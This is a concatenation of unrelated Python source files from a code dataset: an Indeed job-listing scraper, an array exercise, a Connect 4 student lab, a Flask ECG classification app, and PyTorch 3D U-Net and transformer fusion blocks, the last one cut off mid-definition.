'/opt/homebrew/bin/chromedriver'\n\ndef get_jobs(keyword, num_jobs, verbose):\n \n #Initializing the webdriver\n options = webdriver.ChromeOptions()\n \n\n #Change the path to where chromedriver is in your home folder.\n driver = webdriver.Chrome(executable_path=path, options=options)\n driver.set_window_size(1120, 1000)\n \n url = 'https://ca.indeed.com/jobs?l=Canada'\n driver.get(url)\n \n advanced_search = driver.find_element_by_xpath(\"//a[contains(text(),'Advanced Job Search')]\")\n advanced_search.click()\n \n #search data science \n search_job = driver.find_element_by_xpath('//input[@id=\"as_and\"]')\n search_job.send_keys(['data scientist'])\n #set display limit of 30 results per page\n display_limit = driver.find_element_by_xpath('//select[@id=\"limit\"]//option[@value=\"50\"]')\n display_limit.click()\n #sort by date\n sort_option = driver.find_element_by_xpath('//select[@id=\"sort\"]//option[@value=\"date\"]')\n sort_option.click()\n search_button = driver.find_element_by_xpath('//*[@id=\"fj\"]')\n search_button.click()\n \n close_popup = driver.find_element_by_xpath('//div[@id=\"popover-x\"]/button')\n close_popup.click()\n #select only English jobs\n lang_div = driver.find_element_by_xpath('//*[@id=\"filter-language\"]/button')\n lang_div.click()\n filter_lang = driver.find_element_by_xpath('//ul[@id=\"filter-language-menu\"]/li[1]')\n filter_lang.click()\n \n driver.implicitly_wait(3) \n\n jobs = []\n\n\n while len(jobs) < num_jobs: #If true, should be still looking for new jobs.\n\n #Let the page load. Change this number based on your internet speed.\n #Or, wait until the webpage is loaded, instead of hardcoding it.\n time.sleep(4)\n\n \n #Going through each job in this page\n job_buttons = driver.find_elements_by_xpath('//div[contains(@class,\"clickcard\")]')\n \n try:\n driver.find_element_by_css_selector('[alt=\"Close\"]').click() #clicking to the X.\n except NoSuchElementException:\n pass\n \n for job_button in job_buttons: \n\n print(\"Progress: {}\".format(\"\" + str(len(jobs)) + \"/\" + str(num_jobs)))\n if len(jobs) >= num_jobs:\n break\n print(\"here\")\n \n #be random to avoid CAPTCHA\n if len(jobs) % 15 == 0:\n try:\n link = job_button.find_element_by_xpath('.//span[@class=\"caption\"]//a').get_attribute(name=\"href\")\n except:\n link = \"None\"\n \n if len(jobs) % 25 == 0:\n inputElement = driver.find_element_by_id(\"alertemail\")\n inputElement.send_keys('1')\n try:\n link = job_button.find_element_by_xpath('.//h2[@class=\"title\"]//a').get_attribute(name=\"href\")\n except:\n link = \"None\"\n \n try:\n job_button.click() #You might \n except:\n try:\n driver.find_element_by_css_selector('[alt=\"Close\"]').click() #clicking to the X.\n except NoSuchElementException:\n pass\n \n sleepTimes = [2.1, 2.8, 3.2]\n sleep(random.choice(sleepTimes))\n #collected_successfully = False\n \n #while not collected_successfully:\n print(\"here\")\n try:\n company_name = driver.find_element_by_xpath('.//span[@id=\"vjs-cn\"]').text\n print(company_name)\n location = driver.find_element_by_xpath('.//span[@id=\"vjs-loc\"]').text\n print(location)\n job_title = driver.find_element_by_xpath('.//div[@id=\"vjs-jobtitle\"]').text\n print(job_title)\n job_description = driver.find_element_by_xpath('.//div[@id=\"vjs-desc\"]').text\n print(job_description[:30])\n # collected_successfully = True\n except:\n time.sleep(5)\n \n \n \n #Printing for debugging\n if verbose:\n print(\"Job Title: {}\".format(job_title))\n print(\"Job Description: {}\".format(job_description[:500]))\n print(\"Company Name: {}\".format(company_name))\n print(\"Location: {}\".format(location))\n \n \n \n jobs.append({\"Job Title\" : job_title,\n \"Job Description\" : job_description,\n \"Company Name\" : company_name,\n \"Location\" : location\n })\n \n #Clicking on the \"next page\" button\n try: \n next_page = driver.find_element_by_xpath('//a[@aria-label=\"Next\"]//span[@class=\"np\"]')\n next_page.click() \n except NoSuchElementException:\n print(\"Scraping terminated before reaching target number of jobs. Needed {}, got {}.\".format(num_jobs, len(jobs)))\n break\n\n return pd.DataFrame(jobs) \n\ndf = get_jobs('data science', 500, False)\n\ndf.to_csv('glassdoor_jobs.csv')","repo_name":"RemeAjayi/ds-job-detective","sub_path":"indeed-other-scraper.py","file_name":"indeed-other-scraper.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"27370659354","text":"arr = list(map(int, input().split()))\nn = len(arr)\n# Find the left most element which\n# will be the starting of unsorted array\nfor l in range(n-1):\n if arr[l] > arr[l+1]:\n break\n\nif l == n-1:\n print('Sorted array')\n\n# Find the ending of unsorted array\nfor r in range(n-1, 0, -1):\n if arr[r] < arr[r-1]:\n break\n\nmax_ = arr[l]\nmin_ = arr[r]\n\n# We sort the unsorted section\nfor i in range(l+1, r+1):\n if arr[i] > max_:\n max_ = arr[i]\n if arr[i] < min_:\n min_ = arr[i]\n\n# Check if any element in LHS sorted section is greater than min\nfor i in range(0,l):\n if arr[i] > min_:\n l = i\n break\n\n# Check if any element in RHS sorted section is smaller than max\nfor i in range(n-1, r,-1):\n if arr[i] < max_:\n r = i\n break\n\nprint(\"starting index of unsorted array: \", l)\nprint(\"last index of unsorted array: \", r)\n","repo_name":"mzfr/Competitive-coding","sub_path":"Arrays/min-unsorted-subarray/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"34665839894","text":"import numpy as np\nimport random\n\n\"\"\"\nYOUR FULL NAME HERE\nYOUR STUDENT ID HERE\n\nASSIGNMENT: COMPLETE randomPlay and randomGame functions below\n\"\"\"\n\n\"\"\"\nECE 105: Programming for Engineers 2\nCreated September 3, 2020\nSteven Weber\n\nModified April 4, 2023\nNaga Kandasamy\n\nConnect4 Starter Code\n\nThis code plays a random game of Connect 4 and checks for a win condition\nThe __main__ method will repeatedly play until a game with no winner is found\n\nVariable convention:\nnr: number of rows\nnc: number of columns\nb: board (6 rows, 7 columns)\nc: column (1 of 7)\nr: row (1 of 6)\np: player index (1 or 2)\n\"\"\"\n\n# Create the board with the initial state\n\n\ndef initBoard(nr, nc):\n # Create board as numpy 2D array, initialized to hold zeros\n return np.zeros((nr, nc), dtype=int)\n\n# Find the row when placing a piece in a given column\n\n\ndef findRow(b, c):\n # get the number of rows\n nr = b.shape[0]\n # get the columnn from the board, convert to list\n col = list(b[:, c])\n # reverse the list (start from bottom)\n rev_col = col[::-1]\n # get the (row) index of the first 0 in the reversed list\n rri = rev_col.index(0)\n # return this position in the original list\n return nr - 1 - rri\n\n# Get list of all open (non-full) columns in board\n\n\ndef openCols(b):\n open_cols = []\n # iterate over column indices j\n for j in range(b.shape[1]):\n # add j to open_cols if it contains a 0\n if 0 in b[:, j]:\n open_cols.append(j)\n return open_cols\n\n\n\"\"\"\nCOMPLETE:\nrandomPlay takes board b and player p\n1. open_cols: get list of open column indices\n2. c: choose column index at random from open_cols\n3. call findrow(b,c) to get row index for that column\n4. b[r,c]: assign b[r,c] with player index p\n5. b: return the board\n\"\"\"\n# Make a random play for player p\n\n\ndef randomPlay(b, p):\n # 1. open_cols: get list of open column indices\n open = openCols(b)\n # 2. c: choose column index at random from open_cols\n # print(f\"open cols{open} length {len(open)}\")\n colidx = random.randint(0, len(open)-1)\n # 3. r: call findrow(b,c) to get row index for that column\n row = findRow(b, open[colidx])\n # 4. b[r,c]: assign b[r,c] with player index p\n # print(f\"row{row}|col{open[colidx]}\")\n b[row, open[colidx]] = p\n # print(b)\n # 5. b: return the board\n return b\n\n# Check if the board is full\n\n\ndef boardFull(b):\n # board is full iff there are no open columns\n return False if openCols(b) else True\n\n\n\"\"\"\nCOMPLETE:\nrandomGame takes board b and repeatedly calls randomPlay:\n1. stopping criterion is that the board is not full\n2. get an updated board by calling randomPlay\n3. check the updated board to see if a player has won, if yes, return board\n4. update the player index (from 1 to 2, or from 2 to 1)\n\"\"\"\n# Play a random game\n\n\ndef randomGame(b):\n p = 1 # player 1 goes first\n # continue to play until board is full\n # replace True with stopping criterion using boardFull(b)\n while not boardFull(b):\n # print(f\"board full {boardFull(b)}\")\n # print(b)\n # make a random play\n randomPlay(b, p)\n # check for a win\n ckWin(b)\n if ckWin(b):\n return b\n # toggle player\n if p == 1:\n p = 2\n elif p == 2:\n p = 1\n # board is full\n return b\n\n# Check board to see if either player has won the game\n\n\ndef ckWin(b):\n # w1 is True if player 1 wins, w2 is True if player 2 wins\n w1 = any([ckRows(b, 1), ckCols(b, 1), ckDiagsFor(b, 1), ckDiagsRev(b, 1)])\n w2 = any([ckRows(b, 2), ckCols(b, 2), ckDiagsFor(b, 2), ckDiagsRev(b, 2)])\n return w1 or w2\n\n# Check each row for a win for player p\n\n\ndef ckRows(b, p):\n # check each row r in b\n return any([ckArray(r, p) for r in b])\n\n# Check each column for a win for player p\n\n\ndef ckCols(b, p):\n # check each column c in b\n return any([ckArray(c, p) for c in b.T])\n\n# Check each forward diagonal for a win for player p\n\n\ndef ckDiagsFor(b, p):\n # offset indices for the diagonals of length 4 or more\n dMin, dMax = -2, 4\n # check each diagonal in b by specifying the offset d\n return any([ckArray(np.diagonal(b, d), p) for d in range(dMin, dMax)])\n\n# Check each reverse diagonal for a win for player p\n\n\ndef ckDiagsRev(b, p):\n # reverse the board: reverse diags in b are forward diags in bf\n bf = np.fliplr(b)\n # offset indices for the diagonals of length 4 or more\n dMin, dMax = -2, 4\n # check each diagonal in bf by specifying the offset d\n return any([ckArray(np.diagonal(bf, d), p) for d in range(dMin, dMax)])\n\n# Check if winning pattern is in array (converted to strings)\n\n\ndef ckArray(a, p):\n # convert the numpy 1-dim array a to a string s (no spaces)\n s = np.array2string(a, separator='')[1:-1]\n # construct the winning pattern for the given player ass ws\n ws = '1111' if p == 1 else '2222'\n # check for the winning pattern (ws) in the array string (s)\n return True if ws in s else False\n\n\n# Main program\nif __name__ == \"__main__\":\n # Connect4 board has 6 rows and 7 columns\n nr, nc = 6, 7\n\n # Repeatedly play a random game until there is no winner\n n, b = 0, []\n print(\"set up complete running game playing game\")\n while b == [] or ckWin(b) == True: # ckWin(b) is True if there is a winner\n print(f\"game number {n}\")\n b = randomGame(initBoard(nr, nc)) # random game board\n n += 1 # number of games played\n\n # Print board, # attempts, and win status of board\n print(b)\n print(n)\n print(ckWin(b))\n","repo_name":"0r-ion/masterworks","sub_path":"ECE105/labs/lab1/Lab1-StarterCode.py","file_name":"Lab1-StarterCode.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10646921285","text":"import sys\n\nfrom cellworld_experiment_service import ExperimentClient\n\nsubject_name = sys.argv[1]\nocclusions = sys.argv[2]\n\nclient = ExperimentClient()\nclient.connect()\nprint(client.start_experiment(prefix=\"HUMAN\", suffix=\"TEST\", subject_name=subject_name, world_configuration=\"hexagonal\", world_implementation=\"vr\", occlusions=occlusions, duration=10))\n","repo_name":"germanespinosa/vr_service","sub_path":"python/start_experiment.py","file_name":"start_experiment.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37729959712","text":"import sys\nsys.path.append('D:\\Semester 6\\Heart-Disease-Prediction-from-ECG-through-Image--Processing\\Ecg.py')\n\nfrom flask import Flask, request, render_template, url_for\nfrom werkzeug.utils import secure_filename\nimport os\nfrom Ecg import ECG\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = 'static/uploads'\napp.config['ALLOWED_EXTENSIONS'] = {'png', 'jpg', 'jpeg', 'gif'}\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in app.config['ALLOWED_EXTENSIONS']\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n file = request.files['file']\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n if not os.path.exists(app.config['UPLOAD_FOLDER']):\n os.makedirs(app.config['UPLOAD_FOLDER'])\n file.save(filepath)\n\n # Create an instance of the ECG class\n ecg_processor = ECG()\n\n # Instead of getImage(), use the uploaded file\n # image_path = ecg_processor.getImage()\n\n # Process the uploaded ECG image\n # You may need to adjust the methods of ECG class to accept the filepath directly\n ecg_processor.displayImage(filepath)\n gray_image = ecg_processor.GrayImgae(filepath)\n leads = ecg_processor.DividingLeads(filepath)\n ecg_processor.PreprocessingLeads(leads)\n ecg_processor.SignalExtraction_Scaling(leads)\n final_data = ecg_processor.CombineConvert1Dsignal()\n reduced_data = ecg_processor.DimensionalReduciton(final_data)\n classification_result = ecg_processor.ModelLoad_predict(reduced_data)\n\n # You would need to implement the logic to gather image file names for rendering\n # images = ['list_of_processed_image_filenames']\n\n # Render the results template with the classification result and images\n return render_template('result.html', result=classification_result, images=images)\n\n return render_template('upload.html')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"HaroonMalik771/Heart-Disease-Prediction-from-ECG-through-Image--Processing","sub_path":"ecg/web/ecg_web_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5754795","text":"import torch\r\nimport torch.nn as nn\r\nimport numpy as np\r\nfrom torch.nn import functional as F\r\n\r\n# ****************************************************************************************\r\n# ----------------------------------- Unet Basic blocks -------------------------------\r\n# ****************************************************************************************\r\nclass UNetEncoder(nn.Module):\r\n def __init__(self, in_channels=1, feature_maps=64, levels=4, norm_type='instance', use_dropout=True, bias=True):\r\n super(UNetEncoder, self).__init__()\r\n\r\n self.in_channels = in_channels\r\n self.feature_maps = feature_maps\r\n self.levels = levels\r\n self.features = nn.Sequential()\r\n self.use_dropout = use_dropout\r\n if self.use_dropout:\r\n self.dropout = nn.Dropout()\r\n\r\n in_features = in_channels\r\n for i in range(levels):\r\n out_features = (2**i) * feature_maps\r\n\r\n conv_block = UNetConvBlock3D(in_features, out_features, norm_type=norm_type, bias=bias)\r\n self.features.add_module('convblock%d' % (i+1), conv_block)\r\n\r\n pool = nn.MaxPool3d(kernel_size=2, stride=2)\r\n self.features.add_module('pool%d' % (i+1), pool)\r\n\r\n in_features = out_features\r\n\r\n\r\n def forward(self, inputs):\r\n encoder_outputs = []\r\n outputs = inputs\r\n for i in range(self.levels):\r\n outputs = getattr(self.features, 'convblock%d' % (i+1))(outputs)\r\n\r\n if i == self.levels-1:\r\n continue\r\n if self.use_dropout:\r\n encoder_outputs.append(self.dropout(outputs))\r\n else:\r\n encoder_outputs.append(outputs)\r\n outputs = getattr(self.features, 'pool%d' % (i+1))(outputs)\r\n\r\n return encoder_outputs, outputs\r\n\r\nclass UNetEncoder_hved(nn.Module):\r\n def __init__(self, in_channels=1, feature_maps=64, levels=4, norm_type='instance', use_dropout=True, bias=True):\r\n super(UNetEncoder_hved, self).__init__()\r\n\r\n self.in_channels = in_channels\r\n self.feature_maps = feature_maps\r\n self.levels = levels\r\n self.features = nn.Sequential()\r\n self.use_dropout = use_dropout\r\n if self.use_dropout:\r\n self.dropout = nn.Dropout()\r\n\r\n in_features = in_channels\r\n for i in range(levels):\r\n out_features = (2**i) * feature_maps\r\n\r\n conv_block = UNetConvBlock3D_hved(in_features, out_features, norm_type=norm_type, bias=bias)\r\n self.features.add_module('convblock%d' % (i+1), conv_block)\r\n\r\n pool = nn.MaxPool3d(kernel_size=2, stride=2)\r\n self.features.add_module('pool%d' % (i+1), pool)\r\n\r\n in_features = out_features\r\n\r\n\r\n def forward(self, inputs):\r\n encoder_outputs = []\r\n outputs = inputs\r\n for i in range(self.levels):\r\n outputs = getattr(self.features, 'convblock%d' % (i+1))(outputs)\r\n\r\n if i == self.levels-1:\r\n continue\r\n if self.use_dropout:\r\n encoder_outputs.append(self.dropout(outputs))\r\n else:\r\n encoder_outputs.append(outputs)\r\n outputs = getattr(self.features, 'pool%d' % (i+1))(outputs)\r\n\r\n return encoder_outputs, outputs\r\n\r\nclass UNetDecoder(nn.Module):\r\n def __init__(self, out_channels, feature_maps=64, levels=4, norm_type='instance', bias=True):\r\n super(UNetDecoder, self).__init__()\r\n self.out_channels = out_channels\r\n self.feature_maps = feature_maps\r\n self.levels = levels\r\n self.features = nn.Sequential()\r\n\r\n for i in range(levels-1):\r\n upconv = UNetUpSamplingBlock3D(2**(levels-i-1) * feature_maps, 2**(levels-i-1) * feature_maps, deconv=False,\r\n bias=bias)\r\n self.features.add_module('upconv%d' % (i+1), upconv)\r\n\r\n conv_block = UNetConvBlock3D(2**(levels-i-2) * feature_maps * 3, 2**(levels-i-2) * feature_maps,\r\n norm_type=norm_type, bias=bias, flag='decoder')\r\n\r\n self.features.add_module('convblock%d' % (i+1), conv_block)\r\n\r\n self.score = nn.Conv3d(feature_maps, out_channels, kernel_size=1, stride=1, bias=bias)\r\n\r\n def forward(self, inputs, encoder_outputs):\r\n encoder_outputs.reverse()\r\n outputs = inputs\r\n for i in range(self.levels-1):\r\n outputs = getattr(self.features, 'upconv%d' % (i+1))(outputs)\r\n outputs = torch.cat([encoder_outputs[i], outputs], dim=1)\r\n outputs = getattr(self.features, 'convblock%d' % (i+1))(outputs)\r\n encoder_outputs.reverse()\r\n return self.score(outputs)\r\n\r\nclass UNetDecoder_hved(nn.Module):\r\n def __init__(self, out_channels, feature_maps=64, levels=4, norm_type='instance', bias=True):\r\n super(UNetDecoder_hved, self).__init__()\r\n self.out_channels = out_channels\r\n self.feature_maps = feature_maps\r\n self.levels = levels\r\n self.features = nn.Sequential()\r\n\r\n for i in range(levels-1):\r\n upconv = UNetUpSamplingBlock3D(2**(levels-i-1) * feature_maps, 2**(levels-i-1) * feature_maps, deconv=False,\r\n bias=bias)\r\n self.features.add_module('upconv%d' % (i+1), upconv)\r\n\r\n conv_block = UNetConvBlock3D_hved(2**(levels-i-2) * feature_maps * 3, 2**(levels-i-2) * feature_maps,\r\n norm_type=norm_type, bias=bias, flag='decoder')\r\n\r\n self.features.add_module('convblock%d' % (i+1), conv_block)\r\n\r\n self.score = nn.Conv3d(feature_maps, out_channels, kernel_size=1, stride=1, bias=bias)\r\n\r\n def forward(self, inputs, encoder_outputs):\r\n encoder_outputs.reverse()\r\n outputs = inputs\r\n for i in range(self.levels-1):\r\n outputs = getattr(self.features, 'upconv%d' % (i+1))(outputs)\r\n outputs = torch.cat([encoder_outputs[i], outputs], dim=1)\r\n outputs = getattr(self.features, 'convblock%d' % (i+1))(outputs)\r\n encoder_outputs.reverse()\r\n return self.score(outputs)\r\n\r\nclass UNetUpSamplingBlock3D(nn.Module):\r\n def __init__(self, in_channels, out_channels, deconv=False, bias=True):\r\n super(UNetUpSamplingBlock3D, self).__init__()\r\n self.deconv = deconv\r\n if self.deconv:\r\n self.up = nn.ConvTranspose3d(in_channels, out_channels, kernel_size=3, stride=2, padding=1)\r\n else:\r\n self.up = nn.Upsample(scale_factor=2, mode='trilinear', align_corners=True)\r\n\r\n def forward(self, *inputs):\r\n if len(inputs) == 2:\r\n return self.forward_concat(inputs[0], inputs[1])\r\n else:\r\n return self.forward_standard(inputs[0])\r\n\r\n def forward_concat(self, inputs1, inputs2):\r\n return torch.cat([inputs1, self.up(inputs2)], 1)\r\n\r\n def forward_standard(self, inputs):\r\n return self.up(inputs)\r\n\r\nclass UNetConvBlock3D(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size=3, padding='SAME', norm_type='instance', bias=True, flag='encoder'):\r\n super(UNetConvBlock3D, self).__init__()\r\n if flag=='encoder':\r\n self.conv1 = ConvNormRelu3D(in_channels, out_channels//2, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n self.conv2 = ConvNormRelu3D(out_channels//2, out_channels, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n else:\r\n self.conv1 = ConvNormRelu3D(in_channels, out_channels, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n self.conv2 = ConvNormRelu3D(out_channels, out_channels, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n\r\n def forward(self, inputs):\r\n outputs = self.conv1(inputs)\r\n outputs = self.conv2(outputs)\r\n return outputs\r\n\r\nclass UNetConvBlock3D_hved(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size=3, padding='SAME', norm_type='instance', bias=True, flag='encoder'):\r\n super(UNetConvBlock3D_hved, self).__init__()\r\n if flag=='encoder':\r\n self.conv1 = NormRelu3DConv(in_channels, out_channels//2, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n self.conv2 = NormRelu3DConv(out_channels//2, out_channels, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n else:\r\n self.conv1 = NormRelu3DConv(in_channels, out_channels, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n self.conv2 = NormRelu3DConv(out_channels, out_channels, kernel_size=kernel_size, padding=padding,\r\n norm_type=norm_type, bias=bias)\r\n\r\n def forward(self, inputs):\r\n outputs = self.conv1(inputs)\r\n outputs = self.conv2(outputs)\r\n return outputs\r\n\r\nclass ConvNormRelu3D(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1,\r\n padding='SAME', bias=True, dilation=1, norm_type='instance'):\r\n\r\n super(ConvNormRelu3D, self).__init__()\r\n norm = nn.BatchNorm3d if norm_type == 'batch' else nn.InstanceNorm3d\r\n if padding == 'same':\r\n p = padding\r\n elif padding == 'SAME':\r\n p = kernel_size // 2\r\n else:\r\n p = 0\r\n\r\n\r\n self.unit = nn.Sequential(nn.Conv3d(in_channels, out_channels, kernel_size=kernel_size,\r\n padding=p, stride=stride, bias=bias, dilation=dilation),\r\n norm(out_channels),\r\n nn.LeakyReLU(0.01, inplace=True))\r\n\r\n def forward(self, inputs):\r\n return self.unit(inputs)\r\n\r\nclass NormRelu3DConv(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1,\r\n padding='SAME', bias=True, dilation=1, norm_type='instance'):\r\n\r\n super(NormRelu3DConv, self).__init__()\r\n norm = nn.BatchNorm3d if norm_type == 'batch' else nn.InstanceNorm3d\r\n if padding == 'SAME':\r\n p = kernel_size // 2\r\n else:\r\n p = 0\r\n\r\n self.unit = nn.Sequential(\r\n norm(in_channels),\r\n nn.LeakyReLU(0.01, inplace=True),\r\n nn.Conv3d(in_channels, out_channels, kernel_size=kernel_size, padding=p, stride=stride, bias=bias, dilation=dilation)\r\n )\r\n\r\n def getpre_n(self, pre):\r\n re = {}\r\n p = pre.flatten()\r\n print(pre.shape)\r\n for i in range(len(p)):\r\n n = int(abs(p[i]))\r\n if n in re.keys():\r\n re[n] += 1\r\n else:\r\n re[n] = 1\r\n print(re)\r\n\r\n def forward(self, inputs):\r\n return self.unit(inputs)\r\n\r\n# ****************************************************************************************\r\n# ------------------------------ TFusion Basic blocks ----------------------------------\r\n# ****************************************************************************************\r\n\r\nclass TF_3D(nn.Module):\r\n def __init__(self, embedding_dim=1024, volumn_size=8, nhead=4, num_layers=8, method='TF'):\r\n super(TF_3D, self).__init__()\r\n self.embedding_dim = embedding_dim\r\n self.d_model = self.embedding_dim\r\n self.patch_dim = 8\r\n self.method = method\r\n self.scale_factor = volumn_size // self.patch_dim\r\n\r\n encoder_layer = nn.TransformerEncoderLayer(d_model=self.d_model, nhead=nhead,\r\n batch_first=True, dim_feedforward=self.d_model * 4)\r\n self.fusion_block = nn.TransformerEncoder(encoder_layer, num_layers=num_layers)\r\n\r\n self.dropout = nn.Dropout(p=0.1)\r\n self.avgpool = nn.AdaptiveAvgPool3d((self.patch_dim, self.patch_dim, self.patch_dim))\r\n self.upsample = DUpsampling3D(self.embedding_dim, self.scale_factor)\r\n if method=='Token':\r\n self.fusion_token = nn.parameter.Parameter(torch.zeros((1, self.patch_dim ** 3, self.d_model)))\r\n\r\n def forward(self, all_content):\r\n\r\n n_modality = len(all_content)\r\n\r\n token_content = self.project(all_content)\r\n position_enc = PositionalEncoding(self.d_model, token_content.size(1))\r\n\r\n out = self.fusion_block(self.dropout(position_enc(token_content)))\r\n atten_map = self.reproject(out, n_modality, self.method)\r\n return self.atten(all_content, atten_map, n_modality)\r\n\r\n def project(self, all_content):\r\n n_modality = len(all_content)\r\n token_content_in = None\r\n for i in range(n_modality):\r\n content = self.avgpool(all_content[i])\r\n content = content.permute(0, 2, 3, 4, 1).contiguous()\r\n content2 = content.view(content.size(0), -1, self.embedding_dim)\r\n if i == 0:\r\n token_content_in = content2\r\n else:\r\n token_content_in = torch.cat([token_content_in, content2], dim=1)\r\n return token_content_in\r\n\r\n def reproject(self, atten_map, n_modality, method):\r\n n_patch = self.patch_dim ** 3\r\n a_m0 = None\r\n for i in range(n_modality):\r\n atten_mapi = atten_map[:, n_patch*i : n_patch*(i+1), :].view(\r\n atten_map.size(0),\r\n self.patch_dim,\r\n self.patch_dim,\r\n self.patch_dim,\r\n self.embedding_dim,\r\n )\r\n\r\n atten_mapi = atten_mapi.permute(0, 4, 1, 2, 3).contiguous()\r\n atten_mapi = self.upsample(atten_mapi).unsqueeze(dim=0)\r\n\r\n if a_m0 == None:\r\n a_m0 = atten_mapi\r\n else:\r\n a_m0 = torch.cat([a_m0, atten_mapi], dim=0)\r\n\r\n a_m = F.softmax(a_m0, dim=0)\r\n return a_m\r\n\r\n def atten(self, all_content, atten_map, n_modality):\r\n output = None\r\n for i in range(n_modality):\r\n a_m = atten_map[i, :, :, :, :, :]\r\n assert all_content[i].shape == a_m.shape, 'all_content and a_m cannot match!!'\r\n if output == None:\r\n output = all_content[i] * a_m\r\n else:\r\n output += all_content[i] * a_m\r\n return output\r\n\r\n\r\nclass DUpsampling3D(nn.Module):\r\n def __init__(self, inplanes, scale):\r\n super(DUpsampling3D, self).__init__()\r\n output_channel = inplanes * (scale ** 3)\r\n self.conv_3d = nn.Conv3d(inplanes, output_channel, kernel_size=1, stride=1, bias=False)\r\n self.scale = scale\r\n\r\n def forward(self, x):\r\n x = self.conv_3d(x)\r\n B, C, D, H, W = x.size()\r\n\r\n x_permuted = x.permute(0, 4, 3, 2, 1)\r\n\r\n x_permuted = x_permuted.contiguous().view((B, W, H, D * self.scale, int(C / (self.scale))))\r\n\r\n x_permuted = x_permuted.permute(0, 3, 1, 2, 4)\r\n\r\n\r\n x_permuted = x_permuted.contiguous().view((B, D * self.scale, W, H * self.scale, int(C / (self.scale**2))))\r\n\r\n x_permuted = x_permuted.permute(0, 1, 3, 2, 4)\r\n\r\n x_permuted = x_permuted.contiguous().view(\r\n (B, D * self.scale, H * self.scale, W * self.scale, int(C / (self.scale **3))))\r\n\r\n x = x_permuted.permute(0, 4, 1, 2, 3)\r\n\r\n return x\r\n\r\nclass PositionalEncoding(nn.Module):\r\n\r\n def __init__(self, d_hid, n_position=200):\r\n super(PositionalEncoding, self).__init__()\r\n\r\n self.register_buffer('pos_table', self._get_sinusoid_encoding_table(n_position, d_hid))\r\n\r\n def _get_sinusoid_encoding_table(self, n_position, d_hid):\r\n\r\n def get_position_angle_vec(position):\r\n return [position / np.power(10000, 2 * (hid_j // 2) / d_hid) for hid_j in range(d_hid)]\r\n\r\n sinusoid_table = np.array([get_position_angle_vec(pos_i) for pos_i in range(n_position)])\r\n sinusoid_table[:, 0::2] = np.sin(sinusoid_table[:, 0::2])\r\n sinusoid_table[:, 1::2] = np.cos(sinusoid_table[:, 1::2])\r\n\r\n return torch.FloatTensor(sinusoid_table).unsqueeze(0)\r\n\r\n def forward(self, x):\r\n return x + self.pos_table[:, :x.size(1)].clone().detach().to(torch.device('cuda'))\r\n\r\n\r\n# ****************************************************************************************\r\n# ------------------------------------ rmbts basic blocks ------------------------------\r\n# ****************************************************************************************\r\nclass general_conv3d(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1,\r\n padding='SAME', bias=True, dilation=1, norm_type=True, dropout=0.0, act=True):\r\n\r\n super(general_conv3d, self).__init__()\r\n if padding == 'SAME':\r\n p = kernel_size // 2\r\n else:\r\n p = 0\r\n self.unit = nn.Sequential(nn.Conv3d(in_channels, out_channels, kernel_size=kernel_size,\r\n padding=p, stride=stride, bias=bias, dilation=dilation))\r\n if dropout != 0.0:\r\n self.unit.add_module('drop', nn.Dropout(p=dropout))\r\n if norm_type:\r\n self.unit.add_module('norm', nn.InstanceNorm3d(out_channels))\r\n if act:\r\n self.unit.add_module('activation',nn.LeakyReLU(0.01, inplace=True))\r\n\r\n def forward(self, inputs):\r\n return self.unit(inputs)\r\n\r\nclass linear(nn.Module):\r\n def __init__(self, units):\r\n\r\n super(linear, self).__init__()\r\n self.unit = nn.Sequential(nn.Flatten(),\r\n nn.LazyLinear(units))\r\n def forward(self, inputs):\r\n return self.unit(inputs)\r\n\r\nclass style_encoder(nn.Module):\r\n def __init__(self, in_channels, n_base_ch_se=32):\r\n super(style_encoder, self).__init__()\r\n\r\n self.unit = nn.Sequential(\r\n general_conv3d(in_channels, n_base_ch_se, kernel_size=7, stride=1),\r\n general_conv3d(n_base_ch_se, n_base_ch_se*2, kernel_size=4, stride=2),\r\n general_conv3d(n_base_ch_se*2, n_base_ch_se*4, kernel_size=4, stride=2),\r\n general_conv3d(n_base_ch_se*4, n_base_ch_se*4, kernel_size=4, stride=2),\r\n general_conv3d(n_base_ch_se*4, n_base_ch_se*4, kernel_size=4, stride=2),\r\n )\r\n self.unit2 = general_conv3d(n_base_ch_se*4, 8, kernel_size=1, stride=1, norm_type=False, act=False)\r\n\r\n def forward(self, inputs):\r\n output = self.unit(inputs)\r\n output = torch.mean(output, dim=(2, 3, 4), keepdim=True)\r\n return self.unit2(output)\r\n\r\n\r\nclass content_encoder(nn.Module):\r\n def __init__(self, in_channels, n_base_filters=16):\r\n super(content_encoder, 